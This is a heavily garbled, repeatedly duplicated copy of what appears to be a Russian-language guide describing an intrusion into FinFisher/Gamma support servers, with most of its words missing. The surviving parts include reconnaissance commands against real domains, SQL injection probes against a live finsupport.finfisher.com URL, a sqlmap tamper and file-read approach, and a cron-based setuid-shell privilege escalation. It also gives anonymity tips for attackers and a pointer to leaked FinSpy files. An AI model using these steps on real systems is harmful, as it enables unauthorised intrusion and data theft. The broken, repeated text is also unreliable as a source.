WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

